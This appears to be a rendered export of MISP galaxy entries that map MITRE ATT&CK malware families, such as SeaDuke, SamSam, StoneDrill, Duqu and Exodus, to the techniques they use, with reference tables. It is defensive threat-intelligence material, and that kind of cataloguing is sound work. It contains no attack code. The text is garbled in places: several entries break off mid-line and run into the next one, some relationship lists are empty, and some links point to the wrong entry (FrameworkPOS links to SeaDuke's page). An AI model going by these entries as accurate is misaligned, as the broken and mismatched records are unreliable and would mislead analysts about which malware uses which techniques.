- uses: `misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"

**Table 4533. Table References**

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<td><a href="https://attack.mitre.org/software/S0035">https://attack.mitre.org/software/S0035</a></td>
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<tr>
<td><a href="https://www2.fireeye.com/rs/fireeye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireeye/images/rpt-apt30.pdf</a></td>
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**SeaDuke - S0053**

[SeaDuke](https://attack.mitre.org/software/S0053) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://attack.mitre.org/software/S0046). (Citation: F-Secure The Dukes)

The tag is: `misp-galaxy:mitre-malware="SeaDuke - S0053"

SeaDuke - S0053 is also known as:

- SeaDuke
- SeaDaddy
- SeaDesk

SeaDuke - S0053 has relationships with:

- similar: `misp-galaxy:malpedia="SEADADDY"` with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4534. Table References

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<td><a href="https://attack.mitre.org/software/S0053">https://attack.mitre.org/software/S0053</a></td>
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**FrameworkPOS - S0503**

[FrameworkPOS](https://attack.mitre.org/software/S0053) is a point of sale (POS) malware used by [FIN6](https://attack.mitre.org/groups/G0037) to steal payment card data from systems that run physical POS devices. (Citation: SentinelOne FrameworkPOS September 2019)
FrameworkPOS - S0503 is also known as:

- FrameworkPOS
- Trinity

FrameworkPOS - S0503 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

**Table 4535. Table References**

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<td><a href="https://attack.mitre.org/software/S0503">Melcoz</a></td>
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<td><a href="https://attack.mitre.org/software/S0503">Melcoz</a></td>
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**Melcoz - S0530**

[Melcoz](https://attack.mitre.org/software/S0530) is a banking trojan family built from the open source tool Remote Access PC. [Melcoz](https://attack.mitre.org/software/S0530) was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal. (Citation: Securelist Brazilian Banking Malware July 2020)

The tag is: *misp-galaxy:mitre-malware="Melcoz - S0530"*

Melcoz - S0530 is also known as:

- Melcoz

Melcoz - S0530 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
zwShell - S0350

zwShell ([https://attack.mitre.org/software/S0350](https://attack.mitre.org/software/S0350)) is a remote access tool (RAT) written in Delphi that has been used by [Night Dragon](https://attack.mitre.org/groups/G0014). *(Citation: McAfee Night Dragon)*

The tag is: `misp-galaxy:mitre-malware="zwShell - S0350"`

zwShell - S0350 is also known as:

- zwShell

zwShell - S0350 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
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<td><a href="https://attack.mitre.org/software/S0350">https://attack.mitre.org/software/S0350</a></td>
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**BONDUPDATER - S0360**

[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)

The tag is: misp-galaxy:mitre-malware="BONDUPDATER - S0360"

BONDUPDATER - S0360 is also known as:

• BONDUPDATER

BONDUPDATER - S0360 has relationships with:


• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-
FLASHFLOOD - S0036

[FLASHFLOOD](https://attack.mitre.org/software/S0036) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)

The tag is: `misp-galaxy:mitre-malware="FLASHFLOOD - S0036"`

FLASHFLOOD - S0036 is also known as:

- FLASHFLOOD

FLASHFLOOD - S0036 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-
SHOTPUT - S0063

[SHOTPUT](https://attack.mitre.org/software/S0063) is a custom backdoor used by [APT3](https://attack.mitre.org/groups/G0022). (Citation: FireEye Clandestine Wolf)

The tag is: `misp-galaxy:mitre-malware="SHOTPUT - S0063"`

SHOTPUT - S0063 is also known as:

- SHOTPUT
- Backdoor.APT.CookieCutter
- Pirpi

SHOTPUT - S0063 has relationships with:

- similar: `misp-galaxy:tool="Pirpi"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"` with `estimative-language:likelihood-probability="almost-certain"`
HAMMERTOSS - S0037

[HAMMERTOSS](https://attack.mitre.org/software/S0037) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: FireEye APT29) (Citation: F-Secure The Dukes)

The tag is: *misp-galaxy:mitre-malware="HAMMERTOSS - S0037"*

HAMMERTOSS - S0037 is also known as:

- HAMMERTOSS
- HammerDuke
- NetDuke

HAMMERTOSS - S0037 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003"* with estimative-language:likelihood-probability="almost-certain"

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</table>

ASPXSpy - S0073

[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. It has been modified by [Threat Group-3390](https://attack.mitre.org/groups/G0027) actors to create the ASPXTool version. (Citation: Dell TG-3390)

The tag is: *misp-galaxy:mitre-malware="ASPXSpy - S0073"*
ASPXSpy - S0073 is also known as:

- ASPXSpy
- ASPXTool

ASPXSpy - S0073 has relationships with:


Table 4542. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="https://attack.mitre.org/software/S0073">https://attack.mitre.org/software/S0073</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage">https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage</a></td>
</tr>
</tbody>
</table>

SamSam - S0370

[SamSam](https://attack.mitre.org/software/S0370) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.(Citation: US-CERT SamSam 2018)(Citation: Talos SamSam Jan 2018)(Citation: Sophos SamSam Apr 2018)(Citation: Symantec SamSam Oct 2018)

The tag is: `misp-galaxy:mitre-malware="SamSam - S0370"`

SamSam - S0370 is also known as:

- SamSam
- Samas

SamSam - S0370 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 4543. Table References

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StoneDrill - S0380

[StoneDrill](https://attack.mitre.org/software/S0380) is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with [APT33](https://attack.mitre.org/groups/G0064). (Citation: FireEye APT33 Sept 2017) (Citation: Kaspersky StoneDrill 2017)

The tag is: `misp-galaxy:mitre-malware="StoneDrill - S0380"`

StoneDrill - S0380 is also known as:

- StoneDrill
- DROPSHOT

StoneDrill - S0380 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Query Registry - T1012"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"

Table 4544. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0380">https://attack.mitre.org/software/S0380</a></td>
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</table>

Duqu - S0038

[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)

The tag is: misp-galaxy:mitre-malware="Duqu - S0038"

Duqu - S0038 is also known as:

• Duqu

Duqu - S0038 has relationships with:

• similar: misp-galaxy:tool="Duqu" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 4545. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0038">https://attack.mitre.org/software/S0038</a></td>
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</table>
**Misdat - S0083**

[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2010 to 2011. (Citation: Cylance Dust Storm)

The tag is: `misp-galaxy:mitre-malware="Misdat - S0083"`

Misdat - S0083 is also known as:

- Misdat

Misdat - S0083 has relationships with:

- similar: `misp-galaxy:malpedia="Misdat"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with `estimative-language:likelihood-probability="almost-certain"`
Adups - S0309

[Adups](https://attack.mitre.org/software/S0309) is software that was pre-installed onto Android devices, including those made by BLU Products. The software was reportedly designed to help a Chinese phone manufacturer monitor user behavior, transferring sensitive data to a Chinese server. (Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)

The tag is: `misp-galaxy:mitre-malware="Adups - S0309"`

Adups - S0309 is also known as:

- Adups

Adups - S0309 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474"` with estimative-language:likelihood-probability="almost-certain"

Table 4547. Table References

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<td><a href="https://attack.mitre.org/software/S0309">https://attack.mitre.org/software/S0309</a></td>
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</table>

SQLRat - S0390

[SQLRat](https://attack.mitre.org/software/S0390) is malware that executes SQL scripts to avoid leaving traditional host artifacts. [FIN7](https://attack.mitre.org/groups/G0046) has been observed using it.(Citation: Flashpoint FIN 7 March 2019)

The tag is: `misp-galaxy:mitre-malware="SQLRat - S0390"`
SQLRat - S0390 is also known as:

- SQLRat

SQLRat - S0390 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0390">https://attack.mitre.org/software/S0390</a></td>
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**JHUHUGIT - S0044**

[JHUHUGIT](https://attack.mitre.org/software/S0044) is malware used by [APT28](https://attack.mitre.org/groups/G0007). It is based on Carberp source code and serves as reconnaissance malware. (Citation: Kaspersky Sofacy) (Citation: F-Secure Sofacy 2015) (Citation: ESET Sednit Part 1) (Citation: FireEye APT28 January 2017)

The tag is: misp-galaxy:mitre-malware="JHUHUGIT - S0044"

JHUHUGIT - S0044 is also known as:

- JHUHUGIT
- Trojan.Sofacy
- Seduploader
- JKEYSKW
Sednit
GAMEFISH
SofacyCarberp

JHUHUGIT - S0044 has relationships with:

- similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 4549. Table References

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<td><a href="https://attack.mitre.org/software/S0044">https://attack.mitre.org/software/S0044</a></td>
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<td><a href="https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/">https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/</a></td>
</tr>
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</table>

SHARPSTATS - S0450

[SHARPSTATS](https://attack.mitre.org/software/S0450) is a .NET backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2019.(Citation: TrendMicro POWERSTATS V3 June 2019)

The tag is: misp-galaxy:mitre-malware="SHARPSTATS - S0450"

SHARPSTATS - S0450 is also known as:

• SHARPSTATS

SHARPSTATS - S0450 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4550. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0450">https://attack.mitre.org/software/S0450</a></td>
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</tbody>
</table>

**ADVSTORESHELL - S0045**

[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is a spying backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)

The tag is: *misp-galaxy:mitre-malware="ADVSTORESHELL - S0045"

**ADVSTORESHELL - S0045** is also known as:

- ADVSTORESHELL
- AZZY
- EVILTOSS
- NETUI
- Sedreco

**ADVSTORESHELL - S0045** has relationships with:

- similar: misp-galaxy:tool="EVILTOSS" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Sedreco" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

Table 4551. Table References

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<td><a href="https://attack.mitre.org/software/S0045">https://attack.mitre.org/software/S0045</a></td>
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<td><a href="https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/">https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/</a></td>
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</table>

Asacub - S0540

[Asacub](https://attack.mitre.org/software/S0540) is a banking trojan that attempts to steal money from victims' bank accounts. It attempts to do this by initiating a wire transfer via SMS message from compromised devices.(Citation: Securelist Asacub)

The tag is: *misp-galaxy:mitre-malware="Asacub - S0540"*

Asacub - S0540 is also known as:

• Asacub

• Trojan-SMS.AndroidOS.Smaps

Asacub - S0540 has relationships with:


• uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native Code - T1575" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with
Anchor - S0504

[Anchor](https://attack.mitre.org/software/S0504) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://attack.mitre.org/software/S0266) on selected high profile targets since at least 2018. (Citation: Cyberreason Anchor December 2019) (Citation: Medium Anchor DNS July 2020)

The tag is: `misp-galaxy:mitre-malware="Anchor - S0504"`

Anchor - S0504 is also known as:

- Anchor
- Anchor_DNS

Anchor - S0504 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="DNS - T1071.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
CloudDuke - S0054

[CloudDuke](https://attack.mitre.org/software/S0054) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: F-Secure The Dukes)
CloudDuke - S0054 is also known as:

- CloudDuke
- MiniDionis
- CloudLook

CloudDuke - S0054 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

**Table 4554. Table References**

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**Exodus - S0405**

[Exodus](https://attack.mitre.org/software/S0405) is Android spyware deployed in two distinct stages named Exodus One (dropper) and Exodus Two (payload).(Citation: SWB Exodus March 2019)

The tag is: misp-galaxy:mitre-malware="Exodus - S0405"

Exodus - S0405 is also known as:

- Exodus
- Exodus One
- Exodus Two

Exodus - S0405 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

